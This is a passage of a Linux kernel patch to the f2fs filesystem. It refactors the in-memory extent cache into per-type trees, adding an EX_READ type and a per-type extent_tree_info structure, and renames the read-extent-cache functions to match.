++	if (!__may_extent_tree(dn->inode, type))
++		return;
++
++	ei.fofs = f2fs_start_bidx_of_node(ofs_of_node(dn->node_page), dn->inode) +
++								dn->ofs_in_node;
++	ei.len = 1;
++
++	if (type == EX_READ) {
++		if (dn->data_blkaddr == NEW_ADDR)
++			ei.blk = NULL_ADDR;
++		else
++			ei.blk = dn->data_blkaddr;
++	}
++	__update_extent_tree_range(dn->inode, &ei, type);
++}
++
++static unsigned int __shrink_extent_tree(struct f2fs_sb_info *sbi, int nr_shrink,
++					enum extent_type type)
++{
++	struct extent_tree_info *eti = &sbi->extent_tree[type];
+ 	struct extent_tree *et, *next;
+ 	struct extent_node *en;
+ 	unsigned int node_cnt = 0, tree_cnt = 0;
+ 	int remained;
+ 
+-	if (!test_opt(sbi, EXTENT_CACHE))
+-		return 0;
+-
+-	if (!atomic_read(&sbi->total_zombie_tree))
++	if (!atomic_read(&eti->total_zombie_tree))
+ 		goto free_node;
+ 
+-	if (!mutex_trylock(&sbi->extent_tree_lock))
++	if (!mutex_trylock(&eti->extent_tree_lock))
+ 		goto out;
+ 
+ 	/* 1. remove unreferenced extent tree */
+-	list_for_each_entry_safe(et, next, &sbi->zombie_list, list) {
++	list_for_each_entry_safe(et, next, &eti->zombie_list, list) {
+ 		if (atomic_read(&et->node_cnt)) {
+ 			write_lock(&et->lock);
+ 			node_cnt += __free_extent_tree(sbi, et);
+@@ -729,61 +843,100 @@ unsigned int f2fs_shrink_extent_tree(struct f2fs_sb_info *sbi, int nr_shrink)
+ 		}
+ 		f2fs_bug_on(sbi, atomic_read(&et->node_cnt));
+ 		list_del_init(&et->list);
+-		radix_tree_delete(&sbi->extent_tree_root, et->ino);
++		radix_tree_delete(&eti->extent_tree_root, et->ino);
+ 		kmem_cache_free(extent_tree_slab, et);
+-		atomic_dec(&sbi->total_ext_tree);
+-		atomic_dec(&sbi->total_zombie_tree);
++		atomic_dec(&eti->total_ext_tree);
++		atomic_dec(&eti->total_zombie_tree);
+ 		tree_cnt++;
+ 
+ 		if (node_cnt + tree_cnt >= nr_shrink)
+ 			goto unlock_out;
+ 		cond_resched();
+ 	}
+-	mutex_unlock(&sbi->extent_tree_lock);
++	mutex_unlock(&eti->extent_tree_lock);
+ 
+ free_node:
+ 	/* 2. remove LRU extent entries */
+-	if (!mutex_trylock(&sbi->extent_tree_lock))
++	if (!mutex_trylock(&eti->extent_tree_lock))
+ 		goto out;
+ 
+ 	remained = nr_shrink - (node_cnt + tree_cnt);
+ 
+-	spin_lock(&sbi->extent_lock);
++	spin_lock(&eti->extent_lock);
+ 	for (; remained > 0; remained--) {
+-		if (list_empty(&sbi->extent_list))
++		if (list_empty(&eti->extent_list))
+ 			break;
+-		en = list_first_entry(&sbi->extent_list,
++		en = list_first_entry(&eti->extent_list,
+ 					struct extent_node, list);
+ 		et = en->et;
+ 		if (!write_trylock(&et->lock)) {
+ 			/* refresh this extent node's position in extent list */
+-			list_move_tail(&en->list, &sbi->extent_list);
++			list_move_tail(&en->list, &eti->extent_list);
+ 			continue;
+ 		}
+ 
+ 		list_del_init(&en->list);
+-		spin_unlock(&sbi->extent_lock);
++		spin_unlock(&eti->extent_lock);
+ 
+ 		__detach_extent_node(sbi, et, en);
+ 
+ 		write_unlock(&et->lock);
+ 		node_cnt++;
+-		spin_lock(&sbi->extent_lock);
++		spin_lock(&eti->extent_lock);
+ 	}
+-	spin_unlock(&sbi->extent_lock);
++	spin_unlock(&eti->extent_lock);
+ 
+ unlock_out:
+-	mutex_unlock(&sbi->extent_tree_lock);
++	mutex_unlock(&eti->extent_tree_lock);
+ out:
+-	trace_f2fs_shrink_extent_tree(sbi, node_cnt, tree_cnt);
++	trace_f2fs_shrink_extent_tree(sbi, node_cnt, tree_cnt, type);
+ 
+ 	return node_cnt + tree_cnt;
+ }
+ 
+-unsigned int f2fs_destroy_extent_node(struct inode *inode)
++/* read extent cache operations */
++bool f2fs_lookup_read_extent_cache(struct inode *inode, pgoff_t pgofs,
++				struct extent_info *ei)
++{
++	if (!__may_extent_tree(inode, EX_READ))
++		return false;
++
++	return __lookup_extent_tree(inode, pgofs, ei, EX_READ);
++}
++
++void f2fs_update_read_extent_cache(struct dnode_of_data *dn)
++{
++	return __update_extent_cache(dn, EX_READ);
++}
++
++void f2fs_update_read_extent_cache_range(struct dnode_of_data *dn,
++				pgoff_t fofs, block_t blkaddr, unsigned int len)
++{
++	struct extent_info ei = {
++		.fofs = fofs,
++		.len = len,
++		.blk = blkaddr,
++	};
++
++	if (!__may_extent_tree(dn->inode, EX_READ))
++		return;
++
++	__update_extent_tree_range(dn->inode, &ei, EX_READ);
++}
++
++unsigned int f2fs_shrink_read_extent_tree(struct f2fs_sb_info *sbi, int nr_shrink)
++{
++	if (!test_opt(sbi, READ_EXTENT_CACHE))
++		return 0;
++
++	return __shrink_extent_tree(sbi, nr_shrink, EX_READ);
++}
++
++static unsigned int __destroy_extent_node(struct inode *inode,
++					enum extent_type type)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	struct extent_tree *et = F2FS_I(inode)->extent_tree;
++	struct extent_tree *et = F2FS_I(inode)->extent_tree[type];
+ 	unsigned int node_cnt = 0;
+ 
+ 	if (!et || !atomic_read(&et->node_cnt))
+@@ -796,31 +949,44 @@ unsigned int f2fs_destroy_extent_node(struct inode *inode)
+ 	return node_cnt;
+ }
+ 
+-void f2fs_drop_extent_tree(struct inode *inode)
++void f2fs_destroy_extent_node(struct inode *inode)
++{
++	__destroy_extent_node(inode, EX_READ);
++}
++
++static void __drop_extent_tree(struct inode *inode, enum extent_type type)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	struct extent_tree *et = F2FS_I(inode)->extent_tree;
++	struct extent_tree *et = F2FS_I(inode)->extent_tree[type];
+ 	bool updated = false;
+ 
+-	if (!f2fs_may_extent_tree(inode))
++	if (!__may_extent_tree(inode, type))
+ 		return;
+ 
+ 	write_lock(&et->lock);
+-	set_inode_flag(inode, FI_NO_EXTENT);
+ 	__free_extent_tree(sbi, et);
+-	if (et->largest.len) {
+-		et->largest.len = 0;
+-		updated = true;
++	if (type == EX_READ) {
++		set_inode_flag(inode, FI_NO_EXTENT);
++		if (et->largest.len) {
++			et->largest.len = 0;
++			updated = true;
++		}
+ 	}
+ 	write_unlock(&et->lock);
+ 	if (updated)
+ 		f2fs_mark_inode_dirty_sync(inode, true);
+ }
+ 
+-void f2fs_destroy_extent_tree(struct inode *inode)
++void f2fs_drop_extent_tree(struct inode *inode)
++{
++	__drop_extent_tree(inode, EX_READ);
++}
++
++static void __destroy_extent_tree(struct inode *inode, enum extent_type type)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	struct extent_tree *et = F2FS_I(inode)->extent_tree;
++	struct extent_tree_info *eti = &sbi->extent_tree[type];
++	struct extent_tree *et = F2FS_I(inode)->extent_tree[type];
+ 	unsigned int node_cnt = 0;
+ 
+ 	if (!et)
+@@ -828,76 +994,49 @@ void f2fs_destroy_extent_tree(struct inode *inode)
+ 
+ 	if (inode->i_nlink && !is_bad_inode(inode) &&
+ 					atomic_read(&et->node_cnt)) {
+-		mutex_lock(&sbi->extent_tree_lock);
+-		list_add_tail(&et->list, &sbi->zombie_list);
+-		atomic_inc(&sbi->total_zombie_tree);
+-		mutex_unlock(&sbi->extent_tree_lock);
++		mutex_lock(&eti->extent_tree_lock);
++		list_add_tail(&et->list, &eti->zombie_list);
++		atomic_inc(&eti->total_zombie_tree);
++		mutex_unlock(&eti->extent_tree_lock);
+ 		return;
+ 	}
+ 
+ 	/* free all extent info belong to this extent tree */
+-	node_cnt = f2fs_destroy_extent_node(inode);
++	node_cnt = __destroy_extent_node(inode, type);
+ 
+ 	/* delete extent tree entry in radix tree */
+-	mutex_lock(&sbi->extent_tree_lock);
++	mutex_lock(&eti->extent_tree_lock);
+ 	f2fs_bug_on(sbi, atomic_read(&et->node_cnt));
+-	radix_tree_delete(&sbi->extent_tree_root, inode->i_ino);
++	radix_tree_delete(&eti->extent_tree_root, inode->i_ino);
+ 	kmem_cache_free(extent_tree_slab, et);
+-	atomic_dec(&sbi->total_ext_tree);
+-	mutex_unlock(&sbi->extent_tree_lock);
++	atomic_dec(&eti->total_ext_tree);
++	mutex_unlock(&eti->extent_tree_lock);
+ 
+-	F2FS_I(inode)->extent_tree = NULL;
+-
+-	trace_f2fs_destroy_extent_tree(inode, node_cnt);
+-}
+-
+-bool f2fs_lookup_extent_cache(struct inode *inode, pgoff_t pgofs,
+-					struct extent_info *ei)
+-{
+-	if (!f2fs_may_extent_tree(inode))
+-		return false;
++	F2FS_I(inode)->extent_tree[type] = NULL;
+ 
+-	return f2fs_lookup_extent_tree(inode, pgofs, ei);
++	trace_f2fs_destroy_extent_tree(inode, node_cnt, type);
+ }
+ 
+-void f2fs_update_extent_cache(struct dnode_of_data *dn)
++void f2fs_destroy_extent_tree(struct inode *inode)
+ {
+-	pgoff_t fofs;
+-	block_t blkaddr;
+-
+-	if (!f2fs_may_extent_tree(dn->inode))
+-		return;
+-
+-	if (dn->data_blkaddr == NEW_ADDR)
+-		blkaddr = NULL_ADDR;
+-	else
+-		blkaddr = dn->data_blkaddr;
+-
+-	fofs = f2fs_start_bidx_of_node(ofs_of_node(dn->node_page), dn->inode) +
+-								dn->ofs_in_node;
+-	f2fs_update_extent_tree_range(dn->inode, fofs, blkaddr, 1);
++	__destroy_extent_tree(inode, EX_READ);
+ }
+ 
+-void f2fs_update_extent_cache_range(struct dnode_of_data *dn,
+-				pgoff_t fofs, block_t blkaddr, unsigned int len)
+-
++static void __init_extent_tree_info(struct extent_tree_info *eti)
+ {
+-	if (!f2fs_may_extent_tree(dn->inode))
+-		return;
+-
+-	f2fs_update_extent_tree_range(dn->inode, fofs, blkaddr, len);
++	INIT_RADIX_TREE(&eti->extent_tree_root, GFP_NOIO);
++	mutex_init(&eti->extent_tree_lock);
++	INIT_LIST_HEAD(&eti->extent_list);
++	spin_lock_init(&eti->extent_lock);
++	atomic_set(&eti->total_ext_tree, 0);
++	INIT_LIST_HEAD(&eti->zombie_list);
++	atomic_set(&eti->total_zombie_tree, 0);
++	atomic_set(&eti->total_ext_node, 0);
+ }
+ 
+ void f2fs_init_extent_cache_info(struct f2fs_sb_info *sbi)
+ {
+-	INIT_RADIX_TREE(&sbi->extent_tree_root, GFP_NOIO);
+-	mutex_init(&sbi->extent_tree_lock);
+-	INIT_LIST_HEAD(&sbi->extent_list);
+-	spin_lock_init(&sbi->extent_lock);
+-	atomic_set(&sbi->total_ext_tree, 0);
+-	INIT_LIST_HEAD(&sbi->zombie_list);
+-	atomic_set(&sbi->total_zombie_tree, 0);
+-	atomic_set(&sbi->total_ext_node, 0);
++	__init_extent_tree_info(&sbi->extent_tree[EX_READ]);
+ }
+ 
+ int __init f2fs_create_extent_cache(void)
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 4b44ca1decdd3..a0a232551da97 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -91,7 +91,7 @@ extern const char *f2fs_fault_name[FAULT_MAX];
+ #define F2FS_MOUNT_FLUSH_MERGE		0x00000400
+ #define F2FS_MOUNT_NOBARRIER		0x00000800
+ #define F2FS_MOUNT_FASTBOOT		0x00001000
+-#define F2FS_MOUNT_EXTENT_CACHE		0x00002000
++#define F2FS_MOUNT_READ_EXTENT_CACHE	0x00002000
+ #define F2FS_MOUNT_DATA_FLUSH		0x00008000
+ #define F2FS_MOUNT_FAULT_INJECTION	0x00010000
+ #define F2FS_MOUNT_USRQUOTA		0x00080000
+@@ -593,35 +593,43 @@ enum {
+ /* dirty segments threshold for triggering CP */
+ #define DEFAULT_DIRTY_THRESHOLD		4
+ 
++#define RECOVERY_MAX_RA_BLOCKS		BIO_MAX_VECS
++#define RECOVERY_MIN_RA_BLOCKS		1
++
++#define F2FS_ONSTACK_PAGES	16	/* nr of onstack pages */
++
+ /* for in-memory extent cache entry */
+ #define F2FS_MIN_EXTENT_LEN	64	/* minimum extent length */
+ 
+ /* number of extent info in extent cache we try to shrink */
+-#define EXTENT_CACHE_SHRINK_NUMBER	128
++#define READ_EXTENT_CACHE_SHRINK_NUMBER	128
+ 
+-#define RECOVERY_MAX_RA_BLOCKS		BIO_MAX_VECS
+-#define RECOVERY_MIN_RA_BLOCKS		1
+-
+-#define F2FS_ONSTACK_PAGES	16	/* nr of onstack pages */
++/* extent cache type */
++enum extent_type {
++	EX_READ,
++	NR_EXTENT_CACHES,
++};
+ 
+ struct rb_entry {
+ 	struct rb_node rb_node;		/* rb node located in rb-tree */
+-	union {
+-		struct {
+-			unsigned int ofs;	/* start offset of the entry */
+-			unsigned int len;	/* length of the entry */
+-		};
+-		unsigned long long key;		/* 64-bits key */
+-	} __packed;
++	unsigned int ofs;		/* start offset of the entry */
++	unsigned int len;		/* length of the entry */
+ };
+ 
+ struct extent_info {
+ 	unsigned int fofs;		/* start offset in a file */
+ 	unsigned int len;		/* length of the extent */
+-	u32 blk;			/* start block address of the extent */
++	union {
++		/* read extent_cache */
++		struct {
++			/* start block address of the extent */
++			block_t blk;
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
+-	unsigned int c_len;		/* physical extent length of compressed blocks */
++			/* physical extent length of compressed blocks */
++			unsigned int c_len;
+ #endif
++		};
++	};
+ };
+ 
+ struct extent_node {
+@@ -633,13 +641,25 @@ struct extent_node {
+ 
+ struct extent_tree {
+ 	nid_t ino;			/* inode number */
++	enum extent_type type;		/* keep the extent tree type */
+ 	struct rb_root_cached root;	/* root of extent info rb-tree */
+ 	struct extent_node *cached_en;	/* recently accessed extent node */
+-	struct extent_info largest;	/* largested extent info */
+ 	struct list_head list;		/* to be used by sbi->zombie_list */
+ 	rwlock_t lock;			/* protect extent info rb-tree */
+ 	atomic_t node_cnt;		/* # of extent node in rb-tree*/
+ 	bool largest_updated;		/* largest extent updated */
++	struct extent_info largest;	/* largest cached extent for EX_READ */
++};
++
++struct extent_tree_info {
++	struct radix_tree_root extent_tree_root;/* cache extent cache entries */
++	struct mutex extent_tree_lock;	/* locking extent radix tree */
++	struct list_head extent_list;		/* lru list for shrinker */
++	spinlock_t extent_lock;			/* locking extent lru list */
++	atomic_t total_ext_tree;		/* extent tree count */
++	struct list_head zombie_list;		/* extent zombie tree list */
++	atomic_t total_zombie_tree;		/* extent zombie tree count */
++	atomic_t total_ext_node;		/* extent info count */
+ };
+ 
+ /*
+@@ -801,7 +821,8 @@ struct f2fs_inode_info {
+ 	struct list_head dirty_list;	/* dirty list for dirs and files */
+ 	struct list_head gdirty_list;	/* linked in global dirty list */
+ 	struct task_struct *atomic_write_task;	/* store atomic write task */
+-	struct extent_tree *extent_tree;	/* cached extent_tree entry */
++	struct extent_tree *extent_tree[NR_EXTENT_CACHES];
++					/* cached extent_tree entry */
+ 	struct inode *cow_inode;	/* copy-on-write inode for atomic write */
+ 
+ 	/* avoid racing between foreground op and gc */
+@@ -826,7 +847,7 @@ struct f2fs_inode_info {
+ 	loff_t original_i_size;		/* original i_size before atomic write */
+ };
+ 
+-static inline void get_extent_info(struct extent_info *ext,
++static inline void get_read_extent_info(struct extent_info *ext,
+ 					struct f2fs_extent *i_ext)
+ {
+ 	ext->fofs = le32_to_cpu(i_ext->fofs);
+@@ -834,7 +855,7 @@ static inline void get_extent_info(struct extent_info *ext,
+ 	ext->len = le32_to_cpu(i_ext->len);
+ }
+ 
+-static inline void set_raw_extent(struct extent_info *ext,
++static inline void set_raw_read_extent(struct extent_info *ext,
+ 					struct f2fs_extent *i_ext)
+ {
+ 	i_ext->fofs = cpu_to_le32(ext->fofs);
+@@ -842,17 +863,6 @@ static inline void set_raw_extent(struct extent_info *ext,
+ 	i_ext->len = cpu_to_le32(ext->len);
+ }
+ 
+-static inline void set_extent_info(struct extent_info *ei, unsigned int fofs,
+-						u32 blk, unsigned int len)
+-{
+-	ei->fofs = fofs;
+-	ei->blk = blk;
+-	ei->len = len;
+-#ifdef CONFIG_F2FS_FS_COMPRESSION
+-	ei->c_len = 0;
+-#endif
+-}
+-
+ static inline bool __is_discard_mergeable(struct discard_info *back,
+ 			struct discard_info *front, unsigned int max_len)
+ {
+@@ -872,41 +882,6 @@ static inline bool __is_discard_front_mergeable(struct discard_info *cur,
+ 	return __is_discard_mergeable(cur, front, max_len);
+ }
+ 
+-static inline bool __is_extent_mergeable(struct extent_info *back,
+-						struct extent_info *front)
+-{
+-#ifdef CONFIG_F2FS_FS_COMPRESSION
+-	if (back->c_len && back->len != back->c_len)
+-		return false;
+-	if (front->c_len && front->len != front->c_len)
+-		return false;
+-#endif
+-	return (back->fofs + back->len == front->fofs &&
+-			back->blk + back->len == front->blk);
+-}
+-
+-static inline bool __is_back_mergeable(struct extent_info *cur,
+-						struct extent_info *back)
+-{
+-	return __is_extent_mergeable(back, cur);
+-}
+-
+-static inline bool __is_front_mergeable(struct extent_info *cur,
+-						struct extent_info *front)
+-{
+-	return __is_extent_mergeable(cur, front);
+-}
+-
+-extern void f2fs_mark_inode_dirty_sync(struct inode *inode, bool sync);
+-static inline void __try_update_largest_extent(struct extent_tree *et,
+-						struct extent_node *en)
+-{
+-	if (en->ei.len > et->largest.len) {
+-		et->largest = en->ei;
+-		et->largest_updated = true;
+-	}
+-}
+-
+ /*
+  * For free nid management
+  */
+@@ -1670,14 +1645,7 @@ struct f2fs_sb_info {
+ 	struct mutex flush_lock;		/* for flush exclusion */
+ 
+ 	/* for extent tree cache */
+-	struct radix_tree_root extent_tree_root;/* cache extent cache entries */
+-	struct mutex extent_tree_lock;	/* locking extent radix tree */
+-	struct list_head extent_list;		/* lru list for shrinker */
+-	spinlock_t extent_lock;			/* locking extent lru list */
+-	atomic_t total_ext_tree;		/* extent tree count */
+-	struct list_head zombie_list;		/* extent zombie tree list */
+-	atomic_t total_zombie_tree;		/* extent zombie tree count */
+-	atomic_t total_ext_node;		/* extent info count */
++	struct extent_tree_info extent_tree[NR_EXTENT_CACHES];
+ 
+ 	/* basic filesystem units */
+ 	unsigned int log_sectors_per_block;	/* log2 sectors per block */
+@@ -1761,10 +1729,14 @@ struct f2fs_sb_info {
+ 	unsigned int segment_count[2];		/* # of allocated segments */
+ 	unsigned int block_count[2];		/* # of allocated blocks */
+ 	atomic_t inplace_count;		/* # of inplace update */
+-	atomic64_t total_hit_ext;		/* # of lookup extent cache */
+-	atomic64_t read_hit_rbtree;		/* # of hit rbtree extent node */
+-	atomic64_t read_hit_largest;		/* # of hit largest extent node */
+-	atomic64_t read_hit_cached;		/* # of hit cached extent node */
++	/* # of lookup extent cache */
++	atomic64_t total_hit_ext[NR_EXTENT_CACHES];
++	/* # of hit rbtree extent node */
++	atomic64_t read_hit_rbtree[NR_EXTENT_CACHES];
++	/* # of hit cached extent node */
++	atomic64_t read_hit_cached[NR_EXTENT_CACHES];
++	/* # of hit largest extent node in read extent cache */
++	atomic64_t read_hit_largest;
+ 	atomic_t inline_xattr;			/* # of inline_xattr inodes */
+ 	atomic_t inline_inode;			/* # of inline_data inodes */
+ 	atomic_t inline_dir;			/* # of inline_dentry inodes */
+@@ -2578,6 +2550,7 @@ static inline block_t __start_sum_addr(struct f2fs_sb_info *sbi)
+ 	return le32_to_cpu(F2FS_CKPT(sbi)->cp_pack_start_sum);
+ }
+ 
++extern void f2fs_mark_inode_dirty_sync(struct inode *inode, bool sync);
+ static inline int inc_valid_node_count(struct f2fs_sb_info *sbi,
+ 					struct inode *inode, bool is_inode)
+ {
+@@ -3865,9 +3838,17 @@ struct f2fs_stat_info {
+ 	struct f2fs_sb_info *sbi;
+ 	int all_area_segs, sit_area_segs, nat_area_segs, ssa_area_segs;
+ 	int main_area_segs, main_area_sections, main_area_zones;
+-	unsigned long long hit_largest, hit_cached, hit_rbtree;
+-	unsigned long long hit_total, total_ext;
+-	int ext_tree, zombie_tree, ext_node;
++	unsigned long long hit_cached[NR_EXTENT_CACHES];
++	unsigned long long hit_rbtree[NR_EXTENT_CACHES];
++	unsigned long long total_ext[NR_EXTENT_CACHES];
++	unsigned long long hit_total[NR_EXTENT_CACHES];
++	int ext_tree[NR_EXTENT_CACHES];
++	int zombie_tree[NR_EXTENT_CACHES];
++	int ext_node[NR_EXTENT_CACHES];
++	/* to count memory footprint */
++	unsigned long long ext_mem[NR_EXTENT_CACHES];
++	/* for read extent cache */
++	unsigned long long hit_largest;
+ 	int ndirty_node, ndirty_dent, ndirty_meta, ndirty_imeta;
+ 	int ndirty_data, ndirty_qdata;
+ 	unsigned int ndirty_dirs, ndirty_files, nquota_files, ndirty_all;
+@@ -3926,10 +3907,10 @@ static inline struct f2fs_stat_info *F2FS_STAT(struct f2fs_sb_info *sbi)
+ #define stat_other_skip_bggc_count(sbi)	((sbi)->other_skip_bggc++)
+ #define stat_inc_dirty_inode(sbi, type)	((sbi)->ndirty_inode[type]++)
+ #define stat_dec_dirty_inode(sbi, type)	((sbi)->ndirty_inode[type]--)
+-#define stat_inc_total_hit(sbi)		(atomic64_inc(&(sbi)->total_hit_ext))
+-#define stat_inc_rbtree_node_hit(sbi)	(atomic64_inc(&(sbi)->read_hit_rbtree))
++#define stat_inc_total_hit(sbi, type)		(atomic64_inc(&(sbi)->total_hit_ext[type]))
++#define stat_inc_rbtree_node_hit(sbi, type)	(atomic64_inc(&(sbi)->read_hit_rbtree[type]))
+ #define stat_inc_largest_node_hit(sbi)	(atomic64_inc(&(sbi)->read_hit_largest))
+-#define stat_inc_cached_node_hit(sbi)	(atomic64_inc(&(sbi)->read_hit_cached))
++#define stat_inc_cached_node_hit(sbi, type)	(atomic64_inc(&(sbi)->read_hit_cached[type]))
+ #define stat_inc_inline_xattr(inode)					\
+ 	do {								\
+ 		if (f2fs_has_inline_xattr(inode))			\
+@@ -4052,10 +4033,10 @@ void f2fs_update_sit_info(struct f2fs_sb_info *sbi);
+ #define stat_other_skip_bggc_count(sbi)			do { } while (0)
+ #define stat_inc_dirty_inode(sbi, type)			do { } while (0)
+ #define stat_dec_dirty_inode(sbi, type)			do { } while (0)
+-#define stat_inc_total_hit(sbi)				do { } while (0)
+-#define stat_inc_rbtree_node_hit(sbi)			do { } while (0)
++#define stat_inc_total_hit(sbi, type)			do { } while (0)
++#define stat_inc_rbtree_node_hit(sbi, type)		do { } while (0)
+ #define stat_inc_largest_node_hit(sbi)			do { } while (0)
+-#define stat_inc_cached_node_hit(sbi)			do { } while (0)
++#define stat_inc_cached_node_hit(sbi, type)		do { } while (0)
+ #define stat_inc_inline_xattr(inode)			do { } while (0)
+ #define stat_dec_inline_xattr(inode)			do { } while (0)
+ #define stat_inc_inline_inode(inode)			do { } while (0)
+@@ -4144,12 +4125,9 @@ void f2fs_leave_shrinker(struct f2fs_sb_info *sbi);
+ /*
+  * extent_cache.c
+  */
++bool sanity_check_extent_cache(struct inode *inode);
+ struct rb_entry *f2fs_lookup_rb_tree(struct rb_root_cached *root,
+ 				struct rb_entry *cached_re, unsigned int ofs);
+-struct rb_node **f2fs_lookup_rb_tree_ext(struct f2fs_sb_info *sbi,
+-				struct rb_root_cached *root,
+-				struct rb_node **parent,
+-				unsigned long long key, bool *left_most);
+ struct rb_node **f2fs_lookup_rb_tree_for_insert(struct f2fs_sb_info *sbi,
+ 				struct rb_root_cached *root,
+ 				struct rb_node **parent,
+@@ -4160,21 +4138,25 @@ struct rb_entry *f2fs_lookup_rb_tree_ret(struct rb_root_cached *root,
+ 		struct rb_node ***insert_p, struct rb_node **insert_parent,
+ 		bool force, bool *leftmost);
+ bool f2fs_check_rb_tree_consistence(struct f2fs_sb_info *sbi,
+-				struct rb_root_cached *root, bool check_key);
+-unsigned int f2fs_shrink_extent_tree(struct f2fs_sb_info *sbi, int nr_shrink);
+-void f2fs_init_extent_tree(struct inode *inode, struct page *ipage);
++				struct rb_root_cached *root);
++void f2fs_init_extent_tree(struct inode *inode);
+ void f2fs_drop_extent_tree(struct inode *inode);
+-unsigned int f2fs_destroy_extent_node(struct inode *inode);
++void f2fs_destroy_extent_node(struct inode *inode);
+ void f2fs_destroy_extent_tree(struct inode *inode);
+-bool f2fs_lookup_extent_cache(struct inode *inode, pgoff_t pgofs,
+-			struct extent_info *ei);
+-void f2fs_update_extent_cache(struct dnode_of_data *dn);
+-void f2fs_update_extent_cache_range(struct dnode_of_data *dn,
+-			pgoff_t fofs, block_t blkaddr, unsigned int len);
+ void f2fs_init_extent_cache_info(struct f2fs_sb_info *sbi);
+ int __init f2fs_create_extent_cache(void);
+ void f2fs_destroy_extent_cache(void);
+ 
++/* read extent cache ops */
++void f2fs_init_read_extent_tree(struct inode *inode, struct page *ipage);
++bool f2fs_lookup_read_extent_cache(struct inode *inode, pgoff_t pgofs,
++			struct extent_info *ei);
++void f2fs_update_read_extent_cache(struct dnode_of_data *dn);
++void f2fs_update_read_extent_cache_range(struct dnode_of_data *dn,
++			pgoff_t fofs, block_t blkaddr, unsigned int len);
++unsigned int f2fs_shrink_read_extent_tree(struct f2fs_sb_info *sbi,
++			int nr_shrink);
++
+ /*
+  * sysfs.c
+  */
+@@ -4244,9 +4226,9 @@ int f2fs_write_multi_pages(struct compress_ctx *cc,
+ 						struct writeback_control *wbc,
+ 						enum iostat_type io_type);
+ int f2fs_is_compressed_cluster(struct inode *inode, pgoff_t index);
+-void f2fs_update_extent_tree_range_compressed(struct inode *inode,
+-				pgoff_t fofs, block_t blkaddr, unsigned int llen,
+-				unsigned int c_len);
++void f2fs_update_read_extent_tree_range_compressed(struct inode *inode,
++				pgoff_t fofs, block_t blkaddr,
++				unsigned int llen, unsigned int c_len);
+ int f2fs_read_multi_pages(struct compress_ctx *cc, struct bio **bio_ret,
+ 				unsigned nr_pages, sector_t *last_block_in_bio,
+ 				bool is_readahead, bool for_write);
+@@ -4327,9 +4309,10 @@ static inline bool f2fs_load_compressed_page(struct f2fs_sb_info *sbi,
+ static inline void f2fs_invalidate_compress_pages(struct f2fs_sb_info *sbi,
+ 							nid_t ino) { }
+ #define inc_compr_inode_stat(inode)		do { } while (0)
+-static inline void f2fs_update_extent_tree_range_compressed(struct inode *inode,
+-				pgoff_t fofs, block_t blkaddr, unsigned int llen,
+-				unsigned int c_len) { }
++static inline void f2fs_update_read_extent_tree_range_compressed(
++				struct inode *inode,
++				pgoff_t fofs, block_t blkaddr,
++				unsigned int llen, unsigned int c_len) { }
+ #endif
+ 
+ static inline int set_compress_context(struct inode *inode)
+@@ -4400,26 +4383,6 @@ F2FS_FEATURE_FUNCS(casefold, CASEFOLD);
+ F2FS_FEATURE_FUNCS(compression, COMPRESSION);
+ F2FS_FEATURE_FUNCS(readonly, RO);
+ 
+-static inline bool f2fs_may_extent_tree(struct inode *inode)
+-{
+-	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-
+-	if (!test_opt(sbi, EXTENT_CACHE) ||
+-			is_inode_flag_set(inode, FI_NO_EXTENT) ||
+-			(is_inode_flag_set(inode, FI_COMPRESSED_FILE) &&
+-			 !f2fs_sb_has_readonly(sbi)))
+-		return false;
+-
+-	/*
+-	 * for recovered files during mount do not create extents
+-	 * if shrinker is not registered.
+-	 */
+-	if (list_empty(&sbi->s_list))
+-		return false;
+-
+-	return S_ISREG(inode->i_mode);
+-}
+-
+ #ifdef CONFIG_BLK_DEV_ZONED
+ static inline bool f2fs_blkz_is_seq(struct f2fs_sb_info *sbi, int devi,
+ 				    block_t blkaddr)
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index bf37983304a33..dbad2db68f1bc 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -618,7 +618,7 @@ void f2fs_truncate_data_blocks_range(struct dnode_of_data *dn, int count)
+ 		 */
+ 		fofs = f2fs_start_bidx_of_node(ofs_of_node(dn->node_page),
+ 							dn->inode) + ofs;
+-		f2fs_update_extent_cache_range(dn, fofs, 0, len);
++		f2fs_update_read_extent_cache_range(dn, fofs, 0, len);
+ 		dec_valid_block_count(sbi, dn->inode, nr_free);
+ 	}
+ 	dn->ofs_in_node = ofs;
+@@ -1496,7 +1496,7 @@ static int f2fs_do_zero_range(struct dnode_of_data *dn, pgoff_t start,
+ 		f2fs_set_data_blkaddr(dn);
+ 	}
+ 
+-	f2fs_update_extent_cache_range(dn, start, 0, index - start);
++	f2fs_update_read_extent_cache_range(dn, start, 0, index - start);
+ 
+ 	return ret;
+ }
+@@ -2573,7 +2573,7 @@ static int f2fs_defragment_range(struct f2fs_sb_info *sbi,
+ 	struct f2fs_map_blocks map = { .m_next_extent = NULL,
+ 					.m_seg_type = NO_CHECK_TYPE,
+ 					.m_may_create = false };
+-	struct extent_info ei = {0, 0, 0};
++	struct extent_info ei = {0, };
+ 	pgoff_t pg_start, pg_end, next_pgofs;
+ 	unsigned int blk_per_seg = sbi->blocks_per_seg;
+ 	unsigned int total = 0, sec_num;
+@@ -2605,7 +2605,7 @@ static int f2fs_defragment_range(struct f2fs_sb_info *sbi,
+ 	 * lookup mapping info in extent cache, skip defragmenting if physical
+ 	 * block addresses are continuous.
+ 	 */
+-	if (f2fs_lookup_extent_cache(inode, pg_start, &ei)) {
++	if (f2fs_lookup_read_extent_cache(inode, pg_start, &ei)) {
+ 		if (ei.fofs + ei.len >= pg_end)
+ 			goto out;
+ 	}
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index aa928d1c81597..5cd19fdc10596 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -389,40 +389,95 @@ static unsigned int count_bits(const unsigned long *addr,
+ 	return sum;
+ }
+ 
+-static struct victim_entry *attach_victim_entry(struct f2fs_sb_info *sbi,
+-				unsigned long long mtime, unsigned int segno,
